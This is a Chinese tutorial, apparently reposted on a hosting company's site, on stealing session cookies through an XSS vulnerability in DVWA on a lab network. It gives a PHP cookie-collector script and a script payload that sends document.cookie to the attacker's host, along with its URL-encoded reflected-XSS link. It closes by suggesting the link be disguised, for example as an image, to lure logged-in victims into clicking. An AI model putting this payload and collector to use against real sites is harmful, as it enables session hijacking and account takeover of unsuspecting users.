这篇文章主要讲解了“如何利用XSS漏洞获取对方cookie”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“如何利用XSS漏洞获取对方cookie”吧!
(1)环境搭建
kali linux:192.168.80.136
目标win7: 192.168.80.130
Metasploitable:192.168.80.129
cookie接收脚本get.php(脚本在/var/www/html文件夹下,html文件夹权限777):
<?php $ck =$_GET['cookie']; error_log("$ck\n",3,"cookie.txt"); ?>
(2)XSS漏洞利用
目标登录metasploitable的DVWA,点击存在XSS漏洞的页面,输入如下代码后提交:<script>newImage().src="http://192.168.80.136/get.php?cookie="+document.cookie;</script>
(3)查看cookie
切换到kali,直接查看cookie.txt内容,可以看到获得的cookie。
(4)进一步利用
目标提交后可以在地址栏看到如下URL:
http://192.168.80.129/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Enew+Image%28%29.src%3D%22http%3A%2F%2F192.168.80.136%2Fget.php%3Fcookie%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E#
可以将以上URL伪装成其他形式(如图片),诱使目标点击,在目标已登录的情况下,可以达到同样获取cookie的效果。
免责声明:本站发布的内容(图片、视频和文字)以原创、来自互联网转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系QQ:712375056 进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。
Copyright © 2009-2021 56dr.com. All Rights Reserved. 特网科技 特网云 版权所有 珠海市特网科技有限公司 粤ICP备16109289号
域名注册服务机构:阿里云计算有限公司(万网) 域名服务机构:烟台帝思普网络科技有限公司(DNSPod) CDN服务:阿里云计算有限公司 中国互联网举报中心 增值电信业务经营许可证B2
建议您使用Chrome、Firefox、Edge、IE10及以上版本和360等主流浏览器浏览本网站